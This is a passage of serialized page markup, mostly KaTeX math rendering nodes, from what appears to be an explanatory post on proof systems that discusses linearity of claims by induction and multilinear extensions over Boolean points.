me":118309,"style":11470},[11372],[],{"type":27,"tag":207,"props":118312,"children":118314},{"className":118313},[11475],[118315],{"type":33,"value":10380},{"type":27,"tag":207,"props":118317,"children":118319},{"className":118318,"style":11470},[11372],[],{"type":27,"tag":207,"props":118321,"children":118323},{"className":118322},[11283],[118324,118328,118385,118390,118447,118452,118456,118461],{"type":27,"tag":207,"props":118325,"children":118327},{"className":118326,"style":11393},[11288],[],{"type":27,"tag":207,"props":118329,"children":118331},{"className":118330},[11294],[118332,118337],{"type":27,"tag":207,"props":118333,"children":118335},{"className":118334,"style":100750},[11294,28860],[118336],{"type":33,"value":116502},{"type":27,"tag":207,"props":118338,"children":118340},{"className":118339},[11309],[118341],{"type":27,"tag":207,"props":118342,"children":118344},{"className":118343},[11314,28914],[118345,118374],{"type":27,"tag":207,"props":118346,"children":118348},{"className":118347},[11319],[118349,118369],{"type":27,"tag":207,"props":118350,"children":118352},{"className":118351,"style":100793},[11324],[118353],{"type":27,"tag":207,"props":118354,"children":118355},{"style":100797},[118356,118360],{"type":27,"tag":207,"props":118357,"children":118359},{"className":118358,"style":11334},[11333],[],{"type":27,"tag":207,"props":118361,"children":118363},{"className":118362},[11339,11340,11341,11342],[118364],{"type":27,"tag":207,"props":118365,"children":118367},{"className":118366},[11294,28860,11342],[118368],{"type":33,"value":4690},{"type":27,"tag":207,"props":118370,"children":118372},{"className":118371},[29017],[118373],{"type":33,"value":29020},{"type":27,"tag":207,"props":118375,"children":118377},{"className":118376},[11319],[118378],{"type":27,"tag":207,"props":118379,"children":118381},{"className":118380,"style":100347},[11324],[118382],{"type":27,"tag":207,"props":118383,"children":118384},{},[],{"type":27,"tag":207,"props":118386,"children":118388},{"className":118387},[28989],[118389],{"type":33,"value":1343},{"type":27,"tag":207,"props":118391,"children":118393},{"className":118392},[11294],[118394,118399],{"type":27,"tag":207,"props":118395,"children":118397},{"className":118396,"style":100264},[11294,28860],[118398],{"type":33,"value":101083},{"type":27,"tag":207,"props":118400,"children":118402},{"className":118401},[11309],[118403],{"type":27,"tag":207,"props":118404,"children":118406},{"className":118405},[11314,28914],[118407,118436],{"type":27,"tag":207,"props":118408,"children":118410},{"className":118409},[11319],[118411,118431],{"type":27,"tag":207,"props":118412,"children":118414},{"className":118413,"style":100793},[11324],[118415],{"type":27,"tag":207,"props":118416,"children":118417},{"style":117250},[118418,118422],{"type":27,"tag":207,"props":118419,"children":118421},{"className":118420,"style":11334},[11333],[],{"type":27,"tag":207,"props":118423,"children":118425},{"className":118424},[11339,11340,11341,11342],[118426],{"type":27,"tag":207,"props":118427,"children":118429},{"className":118428},[11294,28860,11342],[118430],{"type":33,"value":4690},{"type":27,"tag":207,"props":118432,"children":118434},{"className":118433},[29017],[118435],{"type":33,"value":29020},{"type":27,"tag":207,"props":118437,"children":118439},{"className":118438},[11319],[118440],{"type":27,"tag":207,"props":118441,"children":118443},{"className":118442,"style":100347},[11324],[118444],{"type":27,"tag":207,"props":118445,"children":118446},{},[],{"type":27,"tag":207,"props":118448,"children":118450},{"className":118449},[29011],[118451],{"type":33,"value":10416},{"type":27,"tag":207,"props":118453,"children":118455},{"className":118454,"style":11470},[11372],[],{"type":27,"tag":207,"props":118457,"children":118459},{"className":118458},[11475],[118460],{"type":33,"value":10380},{"type":27,"tag":207,"props":118462,"children":118464},{"className":118463,"style":11470},[11372],[],{"type":27,"tag":207,"props":118466,"children":118468},{"className":118467},[11283],[118469,118473,118478,118482,118487],{"type":27,"tag":207,"props":118470,"children":118472},{"className":118471,"style":117406},[11288],[],{"type":27,"tag":207,"props":118474,"children":118476},{"className":118475},[11294,28860],[118477],{"type":33,"value":47},{"type":27,"tag":207,"props":118479,"children":118481},{"className":118480,"style":11373},[11372],[],{"type":27,"tag":207,"props":118483,"children":118485},{"className":118484},[11378],[118486],{"type":33,"value":2227},{"type":27,"tag":207,"props":118488,"children":118490},{"className":118489,"style":11373},[11372],[],{"type":27,"tag":207,"props":118492,"children":118494},{"className":118493},[11283],[118495,118499,118504,118508,118514],{"type":27,"tag":207,"props":118496,"children":118498},{"className":118497,"style":100179},[11288],[],{"type":27,"tag":207,"props":118500,"children":118502},{"className":118501},[11294,28860],[118503],{"type":33,"value":10512},{"type":27,"tag":207,"props":118505,"children":118507},{"className":118506,"style":11373},[11372],[],{"type":27,"tag":207,"props":118509,"children":118511},{"className":118510},[11378],[118512],{"type":33,"value":118513},"⋅",{"type":27,"tag":207,"props":118515,"children":118517},{"className":118516,"style":11373},[11372],[],{"type":27,"tag":207,"props":118519,"children":118521},{"className":118520},[11283],[118522,118526,118583,118587,118592],{"type":27,"tag":207,"props":118523,"children":118525},{"className":118524,"style":117221},[11288],[],{"type":27,"tag":207,"props":118527,"children":118529},{"className":118528},[11294],[118530,118535],{"type":27,"tag":207,"props":118531,"children":118533},{"className":118532,"style":100264},[11294,28860],[118534],{"type":33,"value":101083},{"type":27,"tag":207,"props":118536,"children":118538},{"className":118537},[11309],[118539],{"type":27,"tag":207,"props":118540,"children":118542},{"className":118541},[11314,28914],[118543,118572],{"type":27,"tag":207,"props":118544,"children":118546},{"className":118545},[11319],[118547,118567],{"type":27,"tag":207,"props":118548,"children":118550},{"className":118549,"style":100793},[11324],[118551],{"type":27,"tag":207,"props":118552,"children":118553},{"style":117250},[118554,118558],{"type":27,"tag":207,"props":118555,"children":118557},{"className":118556,"style":11334},[11333],[],{"type":27,"tag":207,"props":118559,"children":118561},{"className":118560},[11339,11340,11341,11342],[118562],{"type":27,"tag":207,"props":118563,"children":118565},{"className":118564},[11294,28860,11342],[118566],{"type":33,"value":4690},{"type":27,"tag":207,"props":118568,"children":118570},{"className":118569},[29017],[118571],{"type":33,"value":29020},{"type":27,"tag":207,"props":118573,"children":118575},{"className":118574},[11319],[118576],{"type":27,"tag":207,"props":118577,"children":118579},{"className":118578,"style":100347},[11324],[118580],{"type":27,"tag":207,"props":118581,"children":118582},{},[],{"type":27,"tag":207,"props":118584,"children":118586},{"className":118585,"style":11470},[11372],[],{"type":27,"tag":207,"props":118588,"children":118590},{"className":118589},[11475],[118591],{"type":33,"value":10380},{"type":27,"tag":207,"props":118593,"children":118595},{"className":118594,"style":11470},[11372],[],{"type":27,"tag":207,"props":118597,"children":118599},{"className":118598},[11283],[118600,118604,118609,118613,118618],{"type":27,"tag":207,"props":118601,"children":118603},{"className":118602,"style":117406},[11288],[],{"type":27,"tag":207,"props":118605,"children":118607},{"className":118606},[11294,28860],[118608],{"type":33,"value":47},{"type":27,"tag":207,"props":118610,"children":118612},{"className":118611,"style":11373},[11372],[],{"type":27,"tag":207,"props":118614,"children":118616},{"className":118615},[11378],[118617],{"type":33,"value":2227},{"type":27,"tag":207,"props":118619,"children":118621},{"className":118620,"style":11373},[11372],[],{"type":27,"tag":207,"props":118623,"children":118625},{"className":118624},[11283],[118626,118630,118635,118706,118710,118715],{"type":27,"tag":207,"props":118627,"children":118629},{"className":118628,"style":11393},[11288],[],{"type":27,"tag":207,"props":118631,"children":118633},{"className":118632},[28989],[118634],{"type":33,"value":1343},{"type":27,"tag":207,"props":118636,"children":118638},{"className":118637},[11294],[118639,118644],{"type":27,"tag":207,"props":118640,"children":118642},{"className":118641,"style":100498},[11294,28860],[118643],{"type":33,"value":100501},{"type":27,"tag":207,"props":118645,"children":118647},{"className":118646},[11309],[118648],{"type":27,"tag":207,"props":118649,"children":118651},{"className":118650},[11314,28914],[118652,118695],{"type":27,"tag":207,"props":118653,"children":118655},{"className":118654},[11319],[118656,118690],{"type":27,"tag":207,"props":118657,"children":118659},{"className":118658,"style":100793},[11324],[118660],{"type":27,"tag":207,"props":118661,"children":118662},{"style":117680},[118663,118667],{"type":27,"tag":207,"props":118664,"children":118666},{"className":118665,"style":11334},[11333],[],{"type":27,"tag":207,"props":118668,"children":118670},{"className":118669},[11339,11340,11341,11342],[118671],{"type":27,"tag":207,"props":118672,"children":118674},{"className":118673},[11294,11342],[118675,118680,118685],{"type":27,"tag":207,"props":118676,"children":118678},{"className":118677},[11294,28860,11342],[118679],{"type":33,"value":4690},{"type":27,"tag":207,"props":118681,"children":118683},{"className":118682},[11378,11342],[118684],{"type":33,"value":11353},{"type":27,"tag":207,"props":118686,"children":118688},{"className":118687},[11294,11342],[118689],{"type":33,"value":1651},{"type":27,"tag":207,"props":118691,"children":118693},{"className":118692},[29017],[118694],{"type":33,"value":29020},{"type":27,"tag":207,"props":118696,"children":118698},{"className":118697},[11319],[118699],{"type":27,"tag":207,"props":118700,"children":118702},{"className":118701,"style":117721},[11324],[118703],{"type":27,"tag":207,"props":118704,"children":118705},{},[],{"type":27,"tag":207,"props":118707,"children":118709},{"className":118708,"style":11373},[11372],[],{"type":27,"tag":207,"props":118711,"children":118713},{"className":118712},[11378],[118714],{"type":33,"value":11353},{"type":27,"tag":207,"props":118716,"children":118718},{"className":118717,"style":11373},[11372],[],{"type":27,"tag":207,"props":118720,"children":118722},{"className":118721},[11283],[118723,118727,118732,118737,118742,118746,118751],{"type":27,"tag":207,"props":118724,"children":118726},{"className":118725,"style":11393},[11288],[],{"type":27,"tag":207,"props":118728,"children":118730},{"className":118729},[11294],[118731],{"type":33,"value":1744},{"type":27,"tag":207,"props":118733,"children":118735},{"className":118734},[11294,28860],[118736],{"type":33,"value":47},{"type":27,"tag":207,"props":118738,"children":118740},{"className":118739},[29011],[118741],{"type":33,"value":10416},{"type":27,"tag":207,"props":118743,"children":118745},{"className":118744,"style":11373},[11372],[],{"type":27,"tag":207,"props":118747,"children":118749},{"className":118748},[11378],[118750],{"type":33,"value":118513},{"type":27,"tag":207,"props":118752,"children":118754},{"className":118753,"style":11373},[11372],[],{"type":27,"tag":207,"props":118756,"children":118758},{"className":118757},[11283],[118759,118763,118820,118824,118829],{"type":27,"tag":207,"props":118760,"children":118762},{"className":118761,"style":117221},[11288],[],{"type":27,"tag":207,"props":118764,"children":118766},{"className":118765},[11294],[118767,118772],{"type":27,"tag":207,"props":118768,"children":118770},{"className":118769,"style":100264},[11294,28860],[118771],{"type":33,"value":101083},{"type":27,"tag":207,"props":118773,"children":118775},{"className":118774},[11309],[118776],{"type":27,"tag":207,"props":118777,"children":118779},{"className":118778},[11314,28914],[118780,118809],{"type":27,"tag":207,"props":118781,"children":118783},{"className":118782},[11319],[118784,118804],{"type":27,"tag":207,"props":118785,"children":118787},{"className":118786,"style":100793},[11324],[118788],{"type":27,"tag":207,"props":118789,"children":118790},{"style":117250},[118791,118795],{"type":27,"tag":207,"props":118792,"children":118794},{"className":118793,"style":11334},[11333],[],{"type":27,"tag":207,"props":118796,"children":118798},{"className":118797},[11339,11340,11341,11342],[118799],{"type":27,"tag":207,"props":118800,"children":118802},{"className":118801},[11294,28860,11342],[118803],{"type":33,"value":4690},{"type":27,"tag":207,"props":118805,"children":118807},{"className":118806},[29017],[118808],{"type":33,"value":29020},{"type":27,"tag":207,"props":118810,"children":118812},{"className":118811},[11319],[118813],{"type":27,"tag":207,"props":118814,"children":118816},{"className":118815,"style":100347},[11324],[118817],{"type":27,"tag":207,"props":118818,"children":118819},{},[],{"type":27,"tag":207,"props":118821,"children":118823},{"className":118822,"style":11470},[11372],[],{"type":27,"tag":207,"props":118825,"children":118827},{"className":118826},[11475],[118828],{"type":33,"value":10380},{"type":27,"tag":207,"props":118830,"children":118832},{"className":118831,"style":11470},[11372],[],{"type":27,"tag":207,"props":118834,"children":118836},{"className":118835},[11283],[118837,118841,118846,118851,118856,118860,118865],{"type":27,"tag":207,"props":118838,"children":118840},{"className":118839,"style":11393},[11288],[],{"type":27,"tag":207,"props":118842,"children":118844},{"className":118843},[11294,28860],[118845],{"type":33,"value":47},{"type":27,"tag":207,"props":118847,"children":118849},{"className":118848},[28989],[118850],{"type":33,"value":1343},{"type":27,"tag":207,"props":118852,"children":118854},{"className":118853},[11294],[118855],{"type":33,"value":1651},{"type":27,"tag":207,"props":118857,"children":118859},{"className":118858,"style":11373},[11372],[],{"type":27,"tag":207,"props":118861,"children":118863},{"className":118862},[11378],[118864],{"type":33,"value":11353},{"type":27,"tag":207,"props":118866,"children":118868},{"className":118867,"style":11373},[11372],[],{"type":27,"tag":207,"props":118870,"children":118872},{"className":118871},[11283],[118873,118877,118882,118939,118944,118948,118953],{"type":27,"tag":207,"props":118874,"children":118876},{"className":118875,"style":11393},[11288],[],{"type":27,"tag":207,"props":118878,"children":118880},{"className":118879},[11294],[118881],{"type":33,"value":1744},{"type":27,"tag":207,"props":118883,"children":118885},{"className":118884},[11294],[118886,118891],{"type":27,"tag":207,"props":118887,"children":118889},{"className":118888,"style":100264},[11294,28860],[118890],{"type":33,"value":101083},{"type":27,"tag":207,"props":118892,"children":118894},{"className":118893},[11309],[118895],{"type":27,"tag":207,"props":118896,"children":118898},{"className":118897},[11314,28914],[118899,118928],{"type":27,"tag":207,"props":118900,"children":118902},{"className":118901},[11319],[118903,118923],{"type":27,"tag":207,"props":118904,"children":118906},{"className":118905,"style":100793},[11324],[118907],{"type":27,"tag":207,"props":118908,"children":118909},{"style":117250},[118910,118914],{"type":27,"tag":207,"props":118911,"children":118913},{"className":118912,"style":11334},[11333],[],{"type":27,"tag":207,"props":118915,"children":118917},{"className":118916},[11339,11340,11341,11342],[118918],{"type":27,"tag":207,"props":118919,"children":118921},{"className":118920},[11294,28860,11342],[118922],{"type":33,"value":4690},{"type":27,"tag":207,"props":118924,"children":118926},{"className":118925},[29017],[118927],{"type":33,"value":29020},{"type":27,"tag":207,"props":118929,"children":118931},{"className":118930},[11319],[118932],{"type":27,"tag":207,"props":118933,"children":118935},{"className":118934,"style":100347},[11324],[118936],{"type":27,"tag":207,"props":118937,"children":118938},{},[],{"type":27,"tag":207,"props":118940,"children":118942},{"className":118941},[29011],[118943],{"type":33,"value":10416},{"type":27,"tag":207,"props":118945,"children":118947},{"className":118946,"style":11373},[11372],[],{"type":27,"tag":207,"props":118949,"children":118951},{"className":118950},[11378],[118952],{"type":33,"value":2227},{"type":27,"tag":207,"props":118954,"children":118956},{"className":118955,"style":11373},[11372],[],{"type":27,"tag":207,"props":118958,"children":118960},{"className":118959},[11283],[118961,118965,119036,119040,119045],{"type":27,"tag":207,"props":118962,"children":118964},{"className":118963,"style":117651},[11288],[],{"type":27,"tag":207,"props":118966,"children":118968},{"className":118967},[11294],[118969,118974],{"type":27,"tag":207,"props":118970,"children":118972},{"className":118971,"style":100498},[11294,28860],[118973],{"type":33,"value":100501},{"type":27,"tag":207,"props":118975,"children":118977},{"className":118976},[11309],[118978],{"type":27,"tag":207,"props":118979,"children":118981},{"className":118980},[11314,28914],[118982,119025],{"type":27,"tag":207,"props":118983,"children":118985},{"className":118984},[11319],[118986,119020],{"type":27,"tag":207,"props":118987,"children":118989},{"className":118988,"style":100793},[11324],[118990],{"type":27,"tag":207,"props":118991,"children":118992},{"style":117680},[118993,118997],{"type":27,"tag":207,"props":118994,"children":118996},{"className":118995,"style":11334},[11333],[],{"type":27,"tag":207,"props":118998,"children":119000},{"className":118999},[11339,11340,11341,11342],[119001],{"type":27,"tag":207,"props":119002,"children":119004},{"className":119003},[11294,11342],[119005,119010,119015],{"type":27,"tag":207,"props":119006,"children":119008},{"className":119007},[11294,28860,11342],[119009],{"type":33,"value":4690},{"type":27,"tag":207,"props":119011,"children":119013},{"className":119012},[11378,11342],[119014],{"type":33,"value":11353},{"type":27,"tag":207,"props":119016,"children":119018},{"className":119017},[11294,11342],[119019],{"type":33,"value":1651},{"type":27,"tag":207,"props":119021,"children":119023},{"className":119022},[29017],[119024],{"type":33,"value":29020},{"type":27,"tag":207,"props":119026,"children":119028},{"className":119027},[11319],[119029],{"type":27,"tag":207,"props":119030,"children":119032},{"className":119031,"style":117721},[11324],[119033],{"type":27,"tag":207,"props":119034,"children":119035},{},[],{"type":27,"tag":207,"props":119037,"children":119039},{"className":119038,"style":11373},[11372],[],{"type":27,"tag":207,"props":119041,"children":119043},{"className":119042},[11378],[119044],{"type":33,"value":118513},{"type":27,"tag":207,"props":119046,"children":119048},{"className":119047,"style":11373},[11372],[],{"type":27,"tag":207,"props":119050,"children":119052},{"className":119051},[11283],[119053,119057],{"type":27,"tag":207,"props":119054,"children":119056},{"className":119055,"style":117221},[11288],[],{"type":27,"tag":207,"props":119058,"children":119060},{"className":119059},[11294],[119061,119066],{"type":27,"tag":207,"props":119062,"children":119064},{"className":119063,"style":100264},[11294,28860],[119065],{"type":33,"value":101083},{"type":27,"tag":207,"props":119067,"children":119069},{"className":119068},[11309],[119070],{"type":27,"tag":207,"props":119071,"children":119073},{"className":119072},[11314,28914],[119074,119103],{"type":27,"tag":207,"props":119075,"children":119077},{"className":119076},[11319],[119078,119098],{"type":27,"tag":207,"props":119079,"children":119081},{"className":119080,"style":100793},[11324],[119082],{"type":27,"tag":207,"props":119083,"children":119084},{"style":117250},[119085,119089],{"type":27,"tag":207,"props":119086,"children":119088},{"className":119087,"style":11334},[11333],[],{"type":27,"tag":207,"props":119090,"children":119092},{"className":119091},[11339,11340,11341,11342],[119093],{"type":27,"tag":207,"props":119094,"children":119096},{"className":119095},[11294,28860,11342],[119097],{"type":33,"value":4690},{"type":27,"tag":207,"props":119099,"children":119101},{"className":119100},[29017],[119102],{"type":33,"value":29020},{"type":27,"tag":207,"props":119104,"children":119106},{"className":119105},[11319],[119107],{"type":27,"tag":207,"props":119108,"children":119110},{"className":119109,"style":100347},[11324],[119111],{"type":27,"tag":207,"props":119112,"children":119113},{},[],{"type":27,"tag":36,"props":119115,"children":119116},{},[119117,119118,119214,119216,119241,119243,119268],{"type":33,"value":53378},{"type":27,"tag":12606,"props":119119,"children":119120},{},[119121,119123],{"type":33,"value":119122},"linear in ",{"type":27,"tag":84,"props":119124,"children":119126},{"className":119125},[11266,11267],[119127],{"type":27,"tag":207,"props":119128,"children":119130},{"className":119129},[11272],[119131],{"type":27,"tag":207,"props":119132,"children":119134},{"className":119133,"ariaHidden":11278},[11277],[119135],{"type":27,"tag":207,"props":119136,"children":119138},{"className":119137},[11283],[119139,119143],{"type":27,"tag":207,"props":119140,"children":119142},{"className":119141,"style":117651},[11288],[],{"type":27,"tag":207,"props":119144,"children":119146},{"className":119145},[11294],[119147,119152],{"type":27,"tag":207,"props":119148,"children":119150},{"className":119149,"style":100498},[11294,28860],[119151],{"type":33,"value":100501},{"type":27,"tag":207,"props":119153,"children":119155},{"className":119154},[11309],[119156],{"type":27,"tag":207,"props":119157,"children":119159},{"className":119158},[11314,28914],[119160,119203],{"type":27,"tag":207,"props":119161,"children":119163},{"className":119162},[11319],[119164,119198],{"type":27,"tag":207,"props":119165,"children":119167},{"className":119166,"style":100793},[11324],[119168],{"type":27,"tag":207,"props":119169,"children":119170},{"style":117680},[119171,119175],{"type":27,"tag":207,"props":119172,"children":119174},{"className":119173,"style":11334},[11333],[],{"type":27,"tag":207,"props":119176,"children":119178},{"className":119177},[11339,11340,11341,11342],[119179],{"type":27,"tag":207,"props":119180,"children":119182},{"className":119181},[11294,11342],[119183,119188,119193],{"type":27,"tag":207,"props":119184,"children":119186},{"className":119185},[11294,28860,11342],[119187],{"type":33,"value":4690},{"type":27,"tag":207,"props":119189,"children":119191},{"className":119190},[11378,11342],[119192],{"type":33,"value":11353},{"type":27,"tag":207,"props":119194,"children":119196},{"className":119195},[11294,11342],[119197],{"type":33,"value":1651},{"type":27,"tag":207,"props":119199,"children":119201},{"className":119200},[29017],[119202],{"type":33,"value":29020},{"type":27,"tag":207,"props":119204,"children":119206},{"className":119205},[11319],[119207],{"type":27,"tag":207,"props":119208,"children":119210},{"className":119209,"style":117721},[11324],[119211],{"type":27,"tag":207,"props":119212,"children":119213},{},[],{"type":33,"value":119215},"! By induction, the final claim is linear in the original ",{"type":27,"tag":84,"props":119217,"children":119219},{"className":119218},[11266,11267],[119220],{"type":27,"tag":207,"props":119221,"children":119223},{"className":119222},[11272],[119224],{"type":27,"tag":207,"props":119225,"children":119227},{"className":119226,"ariaHidden":11278},[11277],[119228],{"type":27,"tag":207,"props":119229,"children":119231},{"className":119230},[11283],[119232,119236],{"type":27,"tag":207,"props":119233,"children":119235},{"className":119234,"style":28855},[11288],[],{"type":27,"tag":207,"props":119237,"children":119239},{"className":119238,"style":100498},[11294,28860],[119240],{"type":33,"value":100501},{"type":33,"value":119242},". If ",{"type":27,"tag":84,"props":119244,"children":119246},{"className":119245},[11266,11267],[119247],{"type":27,"tag":207,"props":119248,"children":119250},{"className":119249},[11272],[119251],{"type":27,"tag":207,"props":119252,"children":119254},{"className":119253,"ariaHidden":11278},[11277],[119255],{"type":27,"tag":207,"props":119256,"children":119258},{"className":119257},[11283],[119259,119263],{"type":27,"tag":207,"props":119260,"children":119262},{"className":119261,"style":28855},[11288],[],{"type":27,"tag":207,"props":119264,"children":119266},{"className":119265,"style":100498},[11294,28860],[119267],{"type":33,"value":100501},{"type":33,"value":119269}," isn't in the transcript, we can solve for it.",{"type":27,"tag":58,"props":119271,"children":119273},{"id":119272},"multilinear-extensions-mles",[119274],{"type":33,"value":119275},"Multilinear Extensions (MLEs)",{"type":27,"tag":36,"props":119277,"children":119278},{},[119279,119281,119366],{"type":33,"value":119280},"An MLE is just the polynomial view of a table over ",{"type":27,"tag":84,"props":119282,"children":119284},{"className":119283},[11266,11267],[119285],{"type":27,"tag":207,"props":119286,"children":119288},{"className":119287},[11272],[119289],{"type":27,"tag":207,"props":119290,"children":119292},{"className":119291,"ariaHidden":11278},[11277],[119293],{"type":27,"tag":207,"props":119294,"children":119296},{"className":119295},[11283],[119297,119301,119306,119311,119316,119320,119325],{"type":27,"tag":207,"props":119298,"children":119300},{"className":119299,"style":11393},[11288],[],{"type":27,"tag":207,"props":119302,"children":119304},{"className":119303},[28989],[119305],{"type":33,"value":1322},{"type":27,"tag":207,"props":119307,"children":119309},{"className":119308},[11294],[119310],{"type":33,"value":1660},{"type":27,"tag":207,"props":119312,"children":119314},{"className":119313},[11404],[119315],{"type":33,"value":11407},{"type":27,"tag":207,"props":119317,"children":119319},{"className":119318,"style":11411},[11372],[],{"type":27,"tag":207,"props":119321,"children":119323},{"className":119322},[11294],[119324],{"type":33,"value":1651},{"type":27,"tag":207,"props":119326,"children":119328},{"className":119327},[29011],[119329,119334],{"type":27,"tag":207,"props":119330,"children":119332},{"className":119331},[29011],[119333],{"type":33,"value":41396},{"type":27,"tag":207,"props":119335,"children":119337},{"className":119336},[11309],[119338],{"type":27,"tag":207,"props":119339,"children":119341},{"className":119340},[11314],[119342],{"type":27,"tag":207,"props":119343,"children":119345},{"className":119344},[11319],[119346],{"type":27,"tag":207,"props":119347,"children":119349},{"className":119348,"style":115968},[11324],[119350],{"type":27,"tag":207,"props":119351,"children":119352},{"style":11328},[119353,119357],{"type":27,"tag":207,"props":119354,"children":119356},{"className":119355,"style":11334},[11333],[],{"type":27,"tag":207,"props":119358,"children":119360},{"className":119359},[11339,11340,11341,11342],[119361],{"type":27,"tag":207,"props":119362,"children":119364},{"className":119363},[11294,28860,11342],[119365],{"type":33,"value":63637},{"type":33,"value":119367},": it matches the table on Boolean points and extends it to field points.",{"type":27,"tag":36,"props":119369,"children":119370},{},[119371],{"type":33,"value":119372},"For this post, the only property you need is:",{"type":27,"tag":36,"props":119374,"children":119375},{},[119376],{"type":27,"tag":84,"props":119377,"children":119379},{"className":119378},[11266,11267],[119380],{"type":27,"tag":207,"props":119381,"children":119383},{"className":119382},[11272],[119384],{"type":27,"tag":207,"props":119385,"children":119387},{"className":119386,"ariaHidden":11278},[11277],[119388,119550,119822],{"type":27,"tag":207,"props":119389,"children":119391},{"className":119390},[11283],[119392,119397,119466,119471,119532,119537,119541,119546],{"type":27,"tag":207,"props":119393,"children":119396},{"className":119394,"style":119395},[11288],"height:1.1813em;vertical-align:-0.25em;",[],{"type":27,"tag":207,"props":119398,"children":119401},{"className":119399},[11294,119400],"accent",[119402],{"type":27,"tag":207,"props":119403,"children":119405},{"className":119404},[11314,28914],[119406,119454],{"type":27,"tag":207,"props":119407,"children":119409},{"className":119408},[11319],[119410,119449],{"type":27,"tag":207,"props":119411,"children":119414},{"className":119412,"style":119413},[11324],"height:0.9313em;",[119415,119429],{"type":27,"tag":207,"props":119416,"children":119418},{"style":119417},"top:-3em;",[119419,119424],{"type":27,"tag":207,"props":119420,"children":119423},{"className":119421,"style":119422},[11333],"height:3em;",[],{"type":27,"tag":207,"props":119425,"children":119427},{"className":119426,"style":102618},[11294,28860],[119428],{"type":33,"value":7596},{"type":27,"tag":207,"props":119430,"children":119432},{"style":119431},"top:-3.6134em;",[119433,119437],{"type":27,"tag":207,"props":119434,"children":119436},{"className":119435,"style":119422},[11333],[],{"type":27,"tag":207,"props":119438,"children":119442},{"className":119439,"style":119441},[119440],"accent-body","left:-0.0833em;",[119443],{"type":27,"tag":207,"props":119444,"children":119446},{"className":119445},[11294],[119447],{"type":33,"value":119448},"~",{"type":27,"tag":207,"props":119450,"children":119452},{"className":119451},[29017],[119453],{"type":33,"value":29020},{"type":27,"tag":207,"props":119455,"children":119457},{"className":119456},[11319],[119458],{"type":27,"tag":207,"props":119459,"children":119462},{"className":119460,"style":119461},[11324],"height:0.1944em;",[119463],{"type":27,"tag":207,"props":119464,"children":119465},{},[],{"type":27,"tag":207,"props":119467,"children":119469},{"className":119468},[28989],[119470],{"type":33,"value":1343},{"type":27,"tag":207,"props":119472,"children":119474},{"className":119473},[11294,119400],[119475],{"type":27,"tag":207,"props":119476,"children":119478},{"className":119477},[11314],[119479],{"type":27,"tag":207,"props":119480,"children":119482},{"className":119481},[11319],[119483],{"type":27,"tag":207,"props":119484,"children":119487},{"className":119485,"style":119486},[11324],"height:0.714em;",[119488,119500],{"type":27,"tag":207,"props":119489,"children":119490},{"style":119417},[119491,119495],{"type":27,"tag":207,"props":119492,"children":119494},{"className":119493,"style":119422},[11333],[],{"type":27,"tag":207,"props":119496,"children":119498},{"className":119497,"style":100264},[11294,28860],[119499],{"type":33,"value":101083},{"type":27,"tag":207,"props":119501,"children":119502},{"style":119417},[119503,119507],{"type":27,"tag":207,"props":119504,"children":119506},{"className":119505,"style":119422},[11333],[],{"type":27,"tag":207,"props":119508,"children":119511},{"className":119509,"style":119510},[119440],"left:-0.1799em;",[119512],{"type":27,"tag":207,"props":119513,"children":119517},{"className":119514,"style":119516},[119515],"overlay","height:0.714em;width:0.471em;",[119518],{"type":27,"tag":41529,"props":119519,"children":119526},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},"http://www.w3.org/2000/svg","0.471em","0.714em","width:0.471em","0 0 471 714","xMinYMin",[119527],{"type":27,"tag":119528,"props":119529,"children":119531},"path",{"d":119530},"M377 20c0-5.333 1.833-10 5.5-14S391 0 397 0c4.667 0 8.667 1.667 12 5\n3.333 2.667 6.667 9 10 19 6.667 24.667 20.333 43.667 41 57 7.333 4.667 11\n10.667 11 18 0 6-1 10-3 12s-6.667 5-14 9c-28.667 14.667-53.667 35.667-75 63\n-1.333 1.333-3.167 3.5-5.5 6.5s-4 4.833-5 5.5c-1 .667-2.5 1.333-4.5 2s-4.333 1\n-7 1c-4.667 0-9.167-1.833-13.5-5.5S337 184 337 178c0-12.667 15.667-32.333 47-59\nH213l-171-1c-8.667-6-13-12.333-13-19 0-4.667 4.333-11.333 13-20h359\nc-16-25.333-24-45-24-59z",[],{"type":27,"tag":207,"props":119533,"children":119535},{"className":119534},[29011],[119536],{"type":33,"value":10416},{"type":27,"tag":207,"props":119538,"children":119540},{"className":119539,"style":11470},[11372],[],{"type":27,"tag":207,"props":119542,"children":119544},{"className":119543},[11475],[119545],{"type":33,"value":10380},{"type":27,"tag":207,"props":119547,"children":119549},{"className":119548,"style":11470},[11372],[],{"type":27,"tag":207,"props":119551,"children":119553},{"className":119552},[11283],[119554,119559,119740,119744,119749,119754,119804,119809,119813,119818],{"type":27,"tag":207,"props":119555,"children":119558},{"className":119556,"style":119557},[11288],"height:1.4918em;vertical-align:-0.5144em;",[],{"type":27,"tag":207,"props":119560,"children":119562},{"className":119561},[28896],[119563,119568],{"type":27,"tag":207,"props":119564,"children":119566},{"className":119565,"style":28903},[28896,28901,28902],[119567],{"type":33,"value":116046},{"type":27,"tag":207,"props":119569,"children":119571},{"className":119570},[11309],[119572],{"type":27,"tag":207,"props":119573,"children":119575},{"className":119574},[11314,28914],[119576,119728],{"type":27,"tag":207,"props":119577,"children":119579},{"className":119578},[11319],[119580,119723],{"type":27,"tag":207,"props":119581,"children":119584},{"className":119582,"style":119583},[11324],"height:0.3448em;",[119585],{"type":27,"tag":207,"props":119586,"children":119588},{"style":119587},"top:-2.3606em;margin-left:0em;margin-right:0.05em;",[119589,119593],{"type":27,"tag":207,"props":119590,"children":119592},{"className":119591,"style":11334},[11333],[],{"type":27,"tag":207,"props":119594,"children":119596},{"className":119595},[11339,11340,11341,11342],[119597],{"type":27,"tag":207,"props":119598,"children":119600},{"className":119599},[11294,11342],[119601,119655,119660,119665,119670,119675,119680],{"type":27,"tag":207,"props":119602,"children":119604},{"className":119603},[11294,119400,11342],[119605],{"type":27,"tag":207,"props":119606,"children":119608},{"className":119607},[11314],[119609],{"type":27,"tag":207,"props":119610,"children":119612},{"className":119611},[11319],[119613],{"type":27,"tag":207,"props":119614,"children":119617},{"className":119615,"style":119616},[11324],"height:0.9774em;",[119618,119632],{"type":27,"tag":207,"props":119619,"children":119621},{"style":119620},"top:-2.714em;",[119622,119627],{"type":27,"tag":207,"props":119623,"children":119626},{"className":119624,"style":119625},[11333],"height:2.714em;",[],{"type":27,"tag":207,"props":119628,"children":119630},{"className":119629},[11294,28860,11342],[119631],{"type":33,"value":10512},{"type":27,"tag":207,"props":119633,"children":119635},{"style":119634},"top:-2.9774em;",[119636,119640],{"type":27,"tag":207,"props":119637,"children":119639},{"class